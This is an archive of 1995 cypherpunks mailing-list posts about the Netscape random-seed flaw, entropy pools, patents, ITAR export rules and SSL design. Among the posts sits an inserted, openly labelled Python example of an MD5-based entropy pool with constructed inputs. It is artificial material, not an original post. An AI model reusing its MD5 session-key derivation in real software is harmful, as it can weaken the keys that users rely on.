> buffer. Use that as your random number.
>
> How is this any better than feeding the data into the MD5
> hash as I go? This is not a rhetorical question.

Assuming that MD5 loses no entropy, it is identical, or very similar in strength, since in the algorithm that I described the most recently altered part of the buffer depends sensitively on all previous noise accumulated into the buffer, so if the total cumulated entropy is larger than your block size, you are OK.

However the algorithm I described simply used less computation, but the overhead of continually doing MD5 is probably modest.
No matter what you do, if you cumulate a hundred bits of entropy, and if you use a one way hash to generate random numbers so that your session keys do not leak information about your entropy, you are going to be safe against a random number generator attack.

I suggested accumulating a very large amount of entropy, but obviously this is just gilding the lily.

---------------------------------------------------------------------
| We have the right to defend ourselves | http://www.jim.com/jamesd/
| and our property, because of the kind |
| of animals that we are. True law      | James A. Donald
| derives from this right, not from the |
| arbitrary power of the state.         | jamesd at echeque.com

From nelson at santafe.edu Wed Sep 20 23:32:31 1995
From: nelson at santafe.edu (Nelson Minar)
Date: Wed, 20 Sep 95 23:32:31 PDT
Subject: Netscape is doing well -- give 'em a break.
In-Reply-To: <199509202041.NAA07036@comsec.com>
Message-ID: <9509210631.AA18308@sfi.santafe.edu>

> Netscape is to be commended for even *putting* crypto into their product!

I'm impressed with the way Netscape has responded to recent events. It's refreshing to see a company say "yes, we made a mistake in our security software" rather than pretend there's no problem. Word Perfect encryption, anyone?

> Cygnus' Kerberos faced the same random-seed problems and punted in
> similar ways.

Last time I looked, the MIT-MAGIC-COOKIE-1 scheme used in X11R4 had the same problem: the random seed was based on the current time to the microsecond, modulo the granularity of the system clock. I think I figured that on my hardware, if I could figure out which minute the X server started (easy with finger), I'd only have to try a few thousand keys or so. Caveat: I never actually proved the idea.

From jamesd at echeque.com Wed Sep 20 23:39:58 1995
From: jamesd at echeque.com (James A.
Donald)
Date: Wed, 20 Sep 95 23:39:58 PDT
Subject: Entropy vs Random Bits
Message-ID: <199509210639.XAA15833@blob.best.net>

At 11:51 PM 9/20/95 P, David Van Wie wrote:
> This is odd. The term entropy describes an aspect of thermodynamic
> equilibrium in physical systems. Although sometimes used as a synonym for
> "random," that definition is vernacular, not technical. In fact, there is
> no meaningful relationship between "entropy" and random data of the type
> described in the postings related to seed values. In the presence of a
> perfectly suitable and precise mathematical term (i.e. random),

Your use of the word random is incorrect: The throw of a dice is random, but only contains 2.6 bits of entropy. The windows VDT counter is very far from being random, but contains roughly sixteen bits of entropy.

> why invent new terms? Why use them to mean at least two different things?

This is an old term of the art, a term of information theory: We use the same word because entropy in information theory has the same measure as entropy in thermodynamics.

In both cases the entropy, measured in bits, of an ensemble of possible states is the sum of - P(i) * lg[P(i)] over all the possible states.

---------------------------------------------------------------------
| We have the right to defend ourselves | http://www.jim.com/jamesd/
| and our property, because of the kind |
| of animals that we are. True law      | James A. Donald
| derives from this right, not from the |
| arbitrary power of the state.         | jamesd at echeque.com

From dvw at hamachi.epr.com Wed Sep 20 23:43:44 1995
From: dvw at hamachi.epr.com (David Van Wie)
Date: Wed, 20 Sep 95 23:43:44 PDT
Subject: Patents and trade secrets
Message-ID: <3061091A@hamachi>

>> After a patent is granted, it is usually a good idea to also maintain some
>> trade secrets in your products -- since trade secrets never "expire," unlike
>> patents.
>> If the patent isn't granted, you still have the option of treating
>> the contents as an intellectual property under trade secret protection.
>
> Rubbish, disclosure is required for a grant of a patent. Unless someone
> skilled in the art can duplicate the invention from the patent claim
> you don't get a patent issued.

Sure disclosure is required. There is no requirement, however, that an invention be your _whole_ product. For example, most automobiles have thousands of patents involved in their creation. It is entirely possible, even commonplace, as I said in my mail, that one or more portions of a product represent practice of patented inventions, and one or more _other_ portions represent trade secrets.

> Trade secret protection is very tricky in any case. It's practically
> useless if you want to protect a product rather than a procedure.

That depends. Obviously, trade secret protection can be very effective for processes involved in manufacturing physical goods. In software, it depends on whether what you are treating as a secret becomes widely known (after which, self-evidently, it is no longer a secret!) For example, if one were to keep the mathematics behind MD5 a trade secret, it is plausible that it would never be "figured out" just from examining object code that implements the algorithm. It doesn't matter if it theoretically could be done, just that it hasn't actually happened.

dvw

From gnu at toad.com Wed Sep 20 23:44:38 1995
From: gnu at toad.com (John Gilmore)
Date: Wed, 20 Sep 95 23:44:38 PDT
Subject: netscape's response (source code review)
In-Reply-To: <199509202028.NAA06925@comsec.com>
Message-ID: <9509210644.AA09480@toad.com>

> > "Netscape has also begun to engage an external group of world-class
> > security experts who will review our solution to this problem before
> > it is sent to customers."
> > A group which offered to review the first version, but
> > Netscape refused.
> Do you mean that cypherpunks offered to review the netscape code > if only we made all the source available on the net? I think "the group" was RSADSI, based on a remark of Jim Bidzos. However, I do think that, like the S1 cipher, your code would get examined for interesting features and flaws by the cypherpunks if you released it. > We will be having at least some of our code reviewed by a > wider audience, but I don't yet know which code, or how wide a review > group. If anyone has specific suggestions for pieces of code that > you would like to see widely reviewed (such as RNG and seed generation) > let me know. It is becoming gradually clearer in cryptanalysis that you can't test security of pieces in isolation. Their interaction with the surrounding code and protocols is key to their security. Ross Anderson's paper at Crypto last month was all about this (``Robustness Principles for Public Key Protocols''). There were also several papers there that showed how you couldn't just treat hash functions like MD5 as black boxes, since embedding them naively into signature protocols made it possible to do things like turn a signed short message into a signed longer (modified!) message. So far the c'punks haven't done anything clever to your protocols; they've exploited basic weaknesses in key length and key generation. There's still a lot of potential in active attacks, three-cornered attacks, replays, etc, that is unexplored. > I realize that some cypherpunks think that we should make all of > our code publicly available. In an ideal world that would be great, > but we live in a world with politicians, crooks, lawyers, stockholders, > etc... Don't expect to see us posting our entire security > library source code to cypherpunks. Naah. I think NCSA should've made Mosaic publicly available, because they wrote it with our tax dollars. 
And I hold it against them that they started the trend of "zero-cost personal-use binaries but no commercial use" that many Net users still confuse with Real Free Software (free as in freedom). But Netscape owns its code, it can do whatever it wants with it. I'd still encourage you to err on the side of release. The strongest tendency in the security industry is for "security by obscurity", i.e. if we just keep this quiet, nobody will figure it out. Customers, even less sophisticated than vendors, often let the vendors get away with it. But it doesn't stop the crooks, and stopping the crooks is what your customers are paying you to do. Code that gets public scrutiny, like published scientific papers, gets debunked and honed and made to really work. Much faster than code and ideas that only circulate in small, closed groups. The reason Kerberos V5 is a lot more secure than V4 is because its security features and flaws could be publicly discussed. Steve Bellovin wrote a whole paper about what was wrong in V4, and lots of people got to chew on that and think about how to fix it. The question that only Netscape management can estimate is: what damage would it risk to your business, if you released *this much* crypto code instead of *that much*. Particularly if you copyright it and prevent commercial re-use without licensing, I doubt it will help your competitors much. There is the risk of revealing a flaw that makes it easy to crack. That has to be balanced against the risk of having such a flaw and not noticing it for years. And finally, I thought a marketing goal was to make your security scheme (SSL) a standard throughout the industry? In that case, publishing it *and allowing* commercial use would encourage people to adopt it -- which is what I think you want. [We all realize that "publishing" crypto code is unconstitutionally regulated by the State Department. So there are logistics to the release process. 
But you are presumably solving them for the 128-bit domestic version; you can use the same procedures to let people download whatever crypto source code you release.]

John Gilmore

From thad at hammerhead.com Wed Sep 20 23:52:44 1995
From: thad at hammerhead.com (Thaddeus J. Beier)
Date: Wed, 20 Sep 95 23:52:44 PDT
Subject: Patents and trade secrets was: Encryption algorithms used in PrivaSoft
Message-ID: <199509210637.XAA11478@hammerhead.com>

> But don't they have to put something on the patent application? Can they
> claim trade secret status for something that was on a patent application,
> but rejected? That seems like they're getting it both ways.

At this point, in this country, a patent is secret until it is issued. It is interesting to note that the process of issuing a patent can take an indefinite period, and to some extent it is in the control of the person seeking the patent. The typical slimy thing to do is to file for a patent, and keep it a trade secret too. Delay the issuance until somebody discovers your secret, then allow the patent to be issued. This is called a "submarine" patent. It allows the best of both worlds, and extends the patent as far into the future as possible (17 years from issue date, in this country, regardless of filing date). You can delay the patent's issuance by continuing to file amendments to it. Gilbert Hyatt's recent patent on microprocessors is the classic example.

Now, this is all expected to change, to become more harmonious with the rest of the world. The changes that I've heard are
1) Go to first-to-file instead of first-to-invent
2) Life is 20 years from filing date, instead of 17 years from issue date
3) Publicize patents some fixed time from filing date, say 1 year

As you can imagine there are armies of lawyers on both sides of the issue, so I don't think that you'll see any changes in the law any time soon, but you never know.
thad
--
Thaddeus Beier              email: thad at hammerhead.com
Technology Development      vox: 408) 286-3376
Hammerhead Productions      fax: 408) 292-8624

From eay at mincom.oz.au Thu Sep 21 00:10:32 1995
From: eay at mincom.oz.au (Eric Young)
Date: Thu, 21 Sep 95 00:10:32 PDT
Subject: (none)
In-Reply-To: <199509210627.XAA14935@blob.best.net>
Message-ID:

On Wed, 20 Sep 1995, James A. Donald wrote:
> However the algorithm I described simply used less computation, but the
> overhead of continually doing MD5 is probably modest.

On a 486DX50 Solaris 2.4 I can do about 40,000 md5's per second. (if input is < 56 bytes and contiguous). With a mixing algorithm this fast, you could use it once per byte and still have an acceptable RNG. It is definitely my hash function of choice :-).

eric
--
Eric Young                  | Signature removed since it was generating
AARNet: eay at mincom.oz.au | more followups than the message contents :-)

From dvw at hamachi.epr.com Thu Sep 21 00:25:01 1995
From: dvw at hamachi.epr.com (David Van Wie)
Date: Thu, 21 Sep 95 00:25:01 PDT
Subject: Entropy vs Random Bits
Message-ID: <306112E3@hamachi>

> Your use of the word random is incorrect: The throw of a dice is
> random, but only contains 2.6 bits of entropy.

The throw isn't random, the data read from the die after it is thrown is random. The use of the term in many of the postings I have read indicates the need for an "unpredictable" quantity in most cases. This quantity may be drawn from a source that has entropy, but it is random.

>> why invent new terms? Why use them to mean at least two different things?

> This is an old term of the art, a term of information theory: We use
> the same word because entropy in information theory has the same
> measure as entropy in thermodynamics.
>
> In both cases the entropy, measured in bits, of an ensemble of
> possible states is the sum of - P(i) * lg[P(i)] over all the possible states.

In thermodynamics, counting states in this fashion is a dicey proposition, but I appreciate the clarification.
Still, it seems to me that the property "bits of entropy" is often substituted for the actual "bits of random data" and is just as puzzling as gathering the "entropy of cool steam"! One can't _do_ anything with a dimensionless measurement. By which I mean, the measure of a property of data is not the data itself, so it still seems like the usage is odd, at times. However, your explanation does address some of the phrases I have seen. Does this mean that entropy is conserved in information theory?

dvw

From jsw at neon.netscape.com Thu Sep 21 00:30:00 1995
From: jsw at neon.netscape.com (Jeff Weinstein)
Date: Thu, 21 Sep 95 00:30:00 PDT
Subject: FROM A FRIEND . . .
In-Reply-To: <199509201648.MAA14624@panix.com>
Message-ID: <43r488$met@tera.mcom.com>

In article <43qvn4$mm at calum.csclub.uwaterloo.ca>, iagoldbe at calum.csclub.uwaterloo.ca (Ian Goldberg) writes:
> In article <43qrhf$gd5 at tera.mcom.com>,
> Jeff Weinstein wrote:
> > I think that the general opinion of engineers and management here at
> > Netscape is that it would be A Really Good Thing to have our US-only
> > 128+ bit version of Netscape Navigator available for download by US
> > citizens and others who are not legally prohibited from using it.
>
> Who _is_ legally prohibited from using it? I think there are some countries
> where the very use of crypto is illegal (could someone please list them?),
> but who else?
>
> There are some people that may be legally prohibited from _obtaining_ it
> from a US site (ITAR yadda), but even so, if JRFurriner downloads
> crypto from company C's site in the US, who's guilty of ITAR-violation?
> Company C for making it available, or JRF for initiating the action
> that caused the bits to be sent out of the country?

Poor choice of words on my part. My understanding is that we cannot export our US-only product, except to Canada - for the use of Canadian citizens.
I also believe that it is illegal for anyone except US citizens, permanent residents of the US (green card holders) and Canadian citizens to use it, even within the US. I'm not a lawyer, and I've not read all of ITAR myself, so I could be totally wrong... --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From gnu at toad.com Thu Sep 21 00:37:26 1995 From: gnu at toad.com (John Gilmore) Date: Thu, 21 Sep 95 00:37:26 PDT Subject: Export via FTP: who's to blame? Ask a court! In-Reply-To: <43qvn4$mm@calum.csclub.uwaterloo.ca> Message-ID: <9509210737.AA10902@toad.com> > (ITAR yadda), but even so, if JRFurriner downloads > crypto from company C's site in the US, who's guilty of ITAR-violation? > Company C for making it available, or JRF for initiating the action > that caused the bits to be send out of the country? This is a question that has never been answered by a court. Personally I think that the Congress can't constitutionally set up a scheme that restricts US citizens from communicating with each other to transfer software. Even if it makes it harder to catch foreigners who break the law. Prior restraints on US citizens' communications can only be done if they are "incidental" to a greater government purpose. When their purpose is to restrain the act of communication itself, they lose. It's even clear that they can't prevent US citizens from communicating with foreigners, so the entire crypto software export regime may be unconstitutional. The more research we do on the First Amendment law, the more it looks this way to me. If some hardy soul wants to set up a nice clean situation, like Phil Karn did for the paper-vs-magnetic-media distinction, I'm sure we can find some more pro-bono (zero cost) lawyers who'll take the case for the fun and notoriety. You don't have to break the law to get into court; Phil didn't, for example. 
You make a situation where the law restricts you, then sue to have the restriction declared invalid. And if you have ever been in court, it's a lot more fun being the Plaintiff than being the Defendant. Doing this will take significant time on your part. Even if the lawyers do 95% of the work, you have to talk with them, review what they write, explain the details in gory detail, and believe in what they're doing for you. And sometimes do things in a way that they are sure is right, even though you yourself aren't sure. And stick with the case even though it would drag on for years through several courts. So it's not something to do lightly. But it's worth it. And it's a lot safer and easier to enforce your civil rights now, than to try to live through the civil war that would follow the slide into authoritarian government. I'd do this case myself, except that I think we should have few single points of failure. If we spread the work around, it's more likely to happen. And your civil rights are safer, because you yourself have learned how to defend them. John From jsw at netscape.com Thu Sep 21 01:07:51 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Thu, 21 Sep 95 01:07:51 PDT Subject: Please send me SSL problems... In-Reply-To: Message-ID: <9509210104.ZM154@tofuhut> On Sep 20, 4:35am, "Erik E. Fair" (Time Keeper) wrote: > Subject: Re: Please send me SSL problems... > Jeff, the SSL specification has a severe *architectural* problem - it > assumes that Internet Protocols are APIs - interface standards, and that > you can just slide a "layer" underneath without anyone noticing. Such is > not the case - all the Internet Protocols are real protocol standards, in > that they specify the syntax, order, and semantics of the actual bits on > the wire. 
> The IETF quite explicitly doesn't care about APIs - that's a host
> software issue, and it doesn't matter what the host software looks like (or
> even what the machine looks like), so long as it gets the bits on the wire
> right, according to the protocol spec. This is how the Internet can make
> very strong guarantees about interoperability.
>
> You can't fiddle with a communication protocol without getting agreement
> from everyone about the change, or extend it in a way that is compatible
> with the protocol you're modifying, on a per-protocol basis (e.g. adding a
> TELNET negotiation option to TELNET for encryption, an FTP command to FTP,
> etc). Otherwise, all you've done is made a private, non-interoperable
> change to an existing protocol that guarantees interoperability *failures*
> between systems that implement the existing specification, versus your own
> version of HTTP, or TELNET, or whatever. In short, the SSL specification,
> as written, proposes to change all Internet application protocols, globally
> - "slide in a layer." That's not how it's done, and it's not the right
> place to do it, even if it appears to work in an enclave of systems.

My view of SSL is that it should not generally be considered a transparent layer that can be plugged in below any application. I don't consider HTTP on top of SSL to be the same as HTTP, or something that can totally replace HTTP. That's why we use a different port and call it https: and not http. I think using TELNET and FTP as examples of protocols that can be transparently layered on top of SSL was unfortunate. I've looked at what it takes to make some existing protocols work with SSL, and I'm not convinced that it's always appropriate. For example FTP and RCMD use multiple connections, which is a royal pain.

It seems that the thing you are objecting to is the wording in the spec, in the "motivation" section, that appears to suggest that the entire internet could run on top of SSL.
I think that section of the spec could just be chopped out, and SSL would still be useful today without pretensions of world domination. If a secure IP standard emerges that is widely deployed and provides similar services, I don't see why SSL couldn't just go away (this is my opinion, not an official position of netscape). This was sort of off the top of my head. I've not spent long hours contemplating these questions...

--Jeff
--
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw at netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.

From jsw at netscape.com Thu Sep 21 01:22:18 1995
From: jsw at netscape.com (Jeff Weinstein)
Date: Thu, 21 Sep 95 01:22:18 PDT
Subject: Please send me SSL problems...
In-Reply-To:
Message-ID: <9509210118.ZM154@tofuhut>

I don't think that the API that SSLRef export is not particularly interesting. We have no attachment to that API. I would expect someone who gets SSLRef to rework the API to suit their application.

--Jeff
--
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw at netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.

From jsw at neon.netscape.com Thu Sep 21 01:41:27 1995
From: jsw at neon.netscape.com (Jeff Weinstein)
Date: Thu, 21 Sep 95 01:41:27 PDT
Subject: Please send me SSL problems...
In-Reply-To:
Message-ID: <43r8e5$ove@tera.mcom.com>

In article <9509210118.ZM154 at tofuhut>, jsw at netscape.com (Jeff Weinstein) writes:
> I don't think that the API that SSLRef export is not particularly interesting.

Yikes!! I can't believe I wrote that. What I meant was: I don't think that the API that SSLRef exports is particularly interesting.

--Jeff
--
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw at netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.
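[Added example for this archive, not code from any poster. It puts the two random-number threads above into working form: the MD5-chained pool that James A. Donald, Phil Karlton and Eric Young discuss (noise stirred in as it arrives, output only as a hash of the pool so session keys do not leak pool state, no output until about a hundred bits have been collected), the -P(i)*lg P(i) entropy measure from the "Entropy vs Random Bits" exchange, and the rule from the exchange-random-numbers thread that follows, that numbers a remote party supplies are stirred in but credited with zero bits. The keystroke gaps and counter reading are constructed; MD5 is kept only because it is the hash under discussion.]

```python
"""Added example, not code from any poster: an MD5-chained entropy pool of the
kind argued over in this thread, plus the -P(i)*lg P(i) entropy measure.
All sample inputs below are constructed."""
import hashlib
import math
import struct


def shannon_entropy_bits(probabilities):
    """Entropy of an ensemble of states: sum over i of -P(i) * lg P(i)."""
    return -sum(p * math.log2(p) for p in probabilities if p > 0)


def uniform_entropy_bits(n_states):
    """Equiprobable states: lg(n). A fair die gives lg 6 = 2.58 bits."""
    return shannon_entropy_bits([1.0 / n_states] * n_states)


class EntropyPool:
    """Stir noise in by chaining MD5 as it arrives (Karlton's 'feed the data
    into the hash as I go'); hand out only hashes of the pool so session keys
    leak nothing about it (Donald's point); keep a conservative bit estimate.
    MD5 is used only because it is the hash under discussion here."""

    POOL_BITS = 128               # one MD5 digest of state cannot hold more
    MIN_BITS_BEFORE_OUTPUT = 100  # Donald's 'a hundred bits of entropy'

    def __init__(self, label=b"constructed-pool"):
        self._state = hashlib.md5(label).digest()
        self._estimated_bits = 0.0
        self._output_counter = 0

    def stir(self, noise, estimated_bits=0.0):
        """new_state = MD5(old_state || noise). Because old_state already
        depends on every earlier sample, hashing the latest state is as
        good as hashing the whole history (the equivalence Donald argues)."""
        self._state = hashlib.md5(self._state + noise).digest()
        credited = max(0.0, float(estimated_bits))
        self._estimated_bits = min(self.POOL_BITS, self._estimated_bits + credited)

    def stir_untrusted(self, noise):
        """Numbers from a remote party: stir them in (they cannot reduce what
        is already there) but credit zero bits, since someone else knows them."""
        self.stir(noise, 0.0)

    def estimated_bits(self):
        return self._estimated_bits

    def ready(self):
        return self._estimated_bits >= self.MIN_BITS_BEFORE_OUTPUT

    def output(self, nbytes):
        """Derive nbytes through MD5 only, then advance the state so that a
        later compromise of the pool does not reveal keys already handed out."""
        if not self.ready():
            raise RuntimeError("pool holds only %.1f estimated bits"
                               % self._estimated_bits)
        out = b""
        while len(out) < nbytes:
            self._output_counter += 1
            out += hashlib.md5(self._state
                               + struct.pack(">Q", self._output_counter)).digest()
        self._state = hashlib.md5(self._state + b"advance").digest()
        return out[:nbytes]


# Constructed samples: inter-keystroke gaps in microseconds and one reading
# of a 16-bit counter (the kind of source the thread calls far from random
# but worth about sixteen bits).
KEYSTROKE_GAPS_US = [
    183420, 97215, 141003, 220987, 88756, 160314, 101542, 132890,
    175660, 93002, 118477, 204311, 79984, 150128, 127733, 166209,
    110850, 189476, 95311, 143920, 172058, 86407, 158893, 121664,
]
COUNTER_READING = 0x9E3B


def fill_pool(gaps_us=KEYSTROKE_GAPS_US, counter=COUNTER_READING,
              bits_per_gap=4.0, remote_numbers=()):
    """Build a pool from the samples: 16 bits for the counter, a deliberately
    low 4 bits per keystroke gap, nothing for remote numbers."""
    pool = EntropyPool()
    pool.stir(struct.pack(">H", counter), 16.0)
    for gap in gaps_us:
        pool.stir(struct.pack(">I", gap), bits_per_gap)
    for number in remote_numbers:
        pool.stir_untrusted(number)
    return pool


if __name__ == "__main__":
    print("fair die: %.2f bits" % uniform_entropy_bits(6))
    pool = fill_pool(remote_numbers=[b"\x00" * 16])
    print("pool estimate: %.0f bits, ready: %s" % (pool.estimated_bits(), pool.ready()))
    print("session key:", pool.output(16).hex())
```

With the 24 constructed gaps the estimate reaches 112 bits, so the pool will hand out a key; with the gaps removed it stays at 16 bits no matter how many remote numbers are stirred in, which is the point of crediting them nothing.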
From damion.furi at the-matrix.com Thu Sep 21 01:45:49 1995
From: damion.furi at the-matrix.com (DAMION FURI)
Date: Thu, 21 Sep 95 01:45:49 PDT
Subject: What's with the list? (Ol
In-Reply-To: <8B18060.00050528DF.uuout@the-matrix.com>
Message-ID: <8B180AF.000505293A.uuout@the-matrix.com>

DM|Anyone else get old c'punks postings remailed to them from August?

Yup. Blech.

furi at the-matrix.com pgp-public-key at demon.co.uk C1225CE1
RADical 1 Systems - Multi-Platform Custom Programming, Service, & Support

From frank at funcom.no Thu Sep 21 02:34:47 1995
From: frank at funcom.no (Frank A Stevenson)
Date: Thu, 21 Sep 95 02:34:47 PDT
Subject: netscape's response
In-Reply-To: <9509201835.ZM154@tofuhut>
Message-ID:

On Wed, 20 Sep 1995, Jeff Weinstein wrote:
> NOTE: my first attempt to send this bounced at toad.com
>
> On Sep 20, 5:16pm, David_A Wagner wrote:
> > Subject: Re: netscape's response
> > In article <9509200139.ZM206 at tofuhut> you write:
> > > On Sep 20, 12:29am, Christian Wettergren wrote:
> > > > One wild idea that I just got was to have servers and clients exchange
> > > > random numbers (not seeds of course), in a kind of chaining way. Since
> > > > most viewers connect to a number of servers, and all servers are
> > > > connected to by many clients, they would mix "randomness sources" with
> > > > each other, making it impossible to observe the local environment
> > > > only. And the random values would of course be encrypted under the
> > > > session key, making it impossible to "watch the wire".
> > >
> > > Wow, this is a great idea!!
> >
> > Are you quite sure this is a good idea?
> >
> > I'd be very scared of it. In particular, it opens up the chance for
> > adversaries to feed you specially chosen numbers to pollute your seeds.

Suppose you divide your random material into several parts:
A: Userinput (updated from Keystroke timing etc.)
B: 'Random' numbers from remote server
C: Time, pid, ppid, etc..
D: other...
Whenever you want to incorporate new data into B you could do something like:

B = B xor Hash (A,B,C,D, fresh 'random')

This would be very hard to pollute with well chosen input.

> What I should have said is that it's a very interesting idea. Given
> current perceptions of netscape, I should have made clear that I
> wouldn't do something like this without getting a lot more discussion
> and review of possible dangers and how to avoid them. I certainly
> can't fault anyone for wondering if we would just implement this
> without thinking it through, given recent events.

Frank

From jirib at sweeney.cs.monash.edu.au Thu Sep 21 02:59:56 1995
From: jirib at sweeney.cs.monash.edu.au (Jiri Baum)
Date: Thu, 21 Sep 95 02:59:56 PDT
Subject: Exchange random numbers (was: Re: netscape's response)
In-Reply-To: <199509210153.SAA25449@Csli.Stanford.EDU>
Message-ID: <199509210958.TAA10764@sweeney.cs.monash.edu.au>

-----BEGIN PGP SIGNED MESSAGE-----

Hello Bill Stewart and cypherpunks at toad.com, "Jeff Weinstein" and Christian Wettergren

Christian Wettergren writes:
> Christian (that's me) writes:
> | One wild idea that I just got was to have servers and clients exchange
> | random numbers (not seeds of course), in a kind of chaining way. Since
...
> Bill Stewart answered:
> | Be _very_ careful with this approach - it's the kind of thing that a
> | rogue server or client might abuse to find out randomness or other state
...
> Of course you have to be very careful, as you say. Did you see my
> problem-section in the original letter? I included it above.
... [the referenced section elided by jirib] ...

If I only ever give out a hash of my seed, and only ever *add* any received info to my seed (and stir it in well), how can anyone find out anything? (Apart from hash weaknesses.)

The only thing that remains is that I cannot really count on a stranger to actually give me something truly random.
In fact, since at least one other person knows it, I shouldn't count any entropy from it at all. However, if I get e bits from each of n servers, and k of them are rogue, then I have e*(n-k) bits, ie e*n*(1-k/n). With a suitably conservative estimate of k/n, this should be acceptable. In any case, accepting donations of entropy cannot possibly reduce the amount of entropy I have, can it? As well as the normal servers, there might be dedicated randomness servers whose sole purpose is to give you a random number. For a toy example, see http://www.cs.monash.edu.au/cgi-bin/cgiwrap/~jirib/random?ToyRandValue (where ToyRandValue should be replaced by whatever your random value is). Again, one would connect to several and stir the results together, confident in the statistics that say at least one is genuine. Of course, we then have a chicken-and-egg problem of getting secure connection to the randomness servers, but we have that anyway. Perhaps each client could keep a pool of randomness, and whenever it runs low connect to the randomness servers to re-fill, initially using "type random text". ... > and that you should only give out approximately the same amount of > randomness to the neighbour, as you point out below. ... I'm not sure I follow this one. Why? If the neighbour is willing to trust me for more, and cannot possibly deduce my seed from the numbers ('cause it's a strong 1-way hash), the only thing it costs me is CPU time - it'd cost me more to keep track of who asked for how much when. ... > My approach solves part of the problem of "the observable local > environment" problem. ... Then again, you can always ping. With a well-chosen target, you get 10 bits raw from the first packet... Perhaps about 7 or 8 of actual usable entropy (and before you flame me, ping melb.dialix.oz.au). Part of this is that once the sources of randomness are sufficiently diverse, it's just easier for an attacker to modify your s/w. 
Especially if you never throw out your seed, so that all your interactions since the beginning are unfathomably stirred into your current key. (Ie I might not mind if I have only 1 bit of entropy per transaction provided that the total entropy is 128 bits. Provided I never reveal my seed, of course. This would mean that the value risked on any particular 128 bits are 128 of my transactions, not just one, but for most people each of those transactions will involve the same CC number so it makes no difference anyway.)

Hope that makes sense...

Jiri
- --
If you want an answer, please mail to . On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMGE3JixV6mvvBgf5AQFcWwP/UMbLaF2IM7y8HAjVUOCRoE4xgp+XkAj9
zQAnd0XnW5nbwqoXJe/WiT/4QQ3Rx/2tV8OhskS1dhy/7WEZ1WtTsEu4Of3YUDJp
rOYf5omToxLVXWNUQrCYUtGUjJo2UdUg2N8NfIR+vXrsZG7HPhfXsrRD9C0W1HJw
yIfcZUzz+s4=
=KJsK
-----END PGP SIGNATURE-----

From frissell at panix.com Thu Sep 21 03:42:30 1995
From: frissell at panix.com (Duncan Frissell)
Date: Thu, 21 Sep 95 03:42:30 PDT
Subject: Cybersecurity
In-Reply-To: <9509201549076057@ci.diamond-bar.ca.us>
Message-ID:

On Thu, 7 Sep 1995 hallam at w3.org wrote:
> The UK Labour party is opposed to key escrow "we do not accept the "clipper
> chip" argument". The Tories have less than half the level of popular support and
> are barely recognisable as a government.
>
> Phill

Wait till Labour finds out that crypto makes "The Caring Society" impossible. Perhaps they'll change their view then.
DCF

From MIGUELDIAZ at megaweb.com Thu Sep 21 03:46:42 1995
From: MIGUELDIAZ at megaweb.com (Miguel Diaz)
Date: Thu, 21 Sep 95 03:46:42 PDT
Subject: Seeds which depend on machine states
Message-ID: <199509211044.GAA25896@mail-e1a.megaweb.com>

It is my suspicion that seeds which depend on machine states (ie state of your computer at a specific instance of time) would always be subject to scrutiny and decryption. As long as the software used to encrypt is not self-modifying, the machine state can (through careful manipulation involving temperature, clocks, processes etc) always be replicated and fixed to an acceptable degree. This allows you to look into the heart of the encryption method and then create a plan to decode based on a brute-force attack. Time is the only friend then of the encryptor and unfortunately in the case of credit cards this typically is measured in years. Plenty of time for brute force attacks to yield fruit.

I'll be gone for two days. Will respond to any comments Saturday.

From anonymous at freezone.remailer Thu Sep 21 04:30:45 1995
From: anonymous at freezone.remailer (anonymous at freezone.remailer)
Date: Thu, 21 Sep 95 04:30:45 PDT
Subject: Fraud Fraut Froth
Message-ID: <199509211130.HAA20039@light.lightlink.com>

NY Times, Sept 21, 1995.

Fraud Can Flourish Without the Internet

To the Editor:

Your Sept. 19 front-page article on the discovery by two University of California graduate students of a flaw in Netscape, the software used for purchases over the Internet's World Wide Web, raises a number of obvious questions.

First, who needs high tech to perpetrate fraud? Any unscrupulous commercial employee could use or sell your credit card number without employing technology.

Every time you hand your card to a waiter in a restaurant, it disappears for several minutes. The department store clerks and gas station attendants you deal with also have access to your card number. How secure is that?
Ever give your credit card number over the phone to make a purchase from a mail-order house? Or to secure a reservation at a hotel? Who's to say that the employees you're speaking with are honest? Or that your phone is not tapped? Or theirs?

I shop on the Internet; I may get ripped off. What's my liability? Fifty bucks -- same as the other scenarios I've described. That's in my credit agreement with the card issuer.

So why all the hoopla? Is credit card fraud significantly more prevalent on the Internet than in other modes of purchasing? Or is the banking industry whipping up hysteria among purchasers to curb fraud losses?

Was the work of those graduate students funded by someone -- directly or indirectly? If so, by whom? A banking consortium? A high-tech company working on some patentable security scheme?

Robert Herrig
Peekskill, N.Y., Sept. 19, 1995.

The writer is a systems consultant.

From unicorn at polaris.mindport.net Thu Sep 21 04:52:49 1995
From: unicorn at polaris.mindport.net (Black Unicorn)
Date: Thu, 21 Sep 95 04:52:49 PDT
Subject: Fraud Fraut Froth
In-Reply-To: <199509211130.HAA20039@light.lightlink.com>
Message-ID:

On Thu, 21 Sep 1995 anonymous at freezone.remailer.mindport.net wrote:

> NY Times, Sept 21, 1995.
>
> Fraud Can Flourish Without the Internet
>
> To the Editor:
>
> Your Sept. 19 front-page article on the discovery by two
> University of California graduate students of a flaw in
> Netscape, the software used for purchases over the Internet's
> World Wide Web, raises a number of obvious questions.
>
> First, who needs high tech to perpetrate fraud? Any
> unscrupulous commercial employee could use or sell your credit
> card number without employing technology.
>
> Every time you hand your card to a waiter in a restaurant, it
> disappears for several minutes. The department store clerks
> and gas station attendants you deal with also have access to
> your card number. How secure is that?

[...]

> Robert Herrig
> Peekskill, N.Y., Sept. 19, 1995.
>
> The writer is a systems consultant.

[For Netscape?]

---
"In fact, had Bancroft not existed,        potestas scientiae in usu est
 Franklin might have had to invent him."   in nihilum nil posse reverti
00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information

From nsb at radiomail.net Thu Sep 21 05:33:39 1995
From: nsb at radiomail.net (NSB's Portable (via RadioMail))
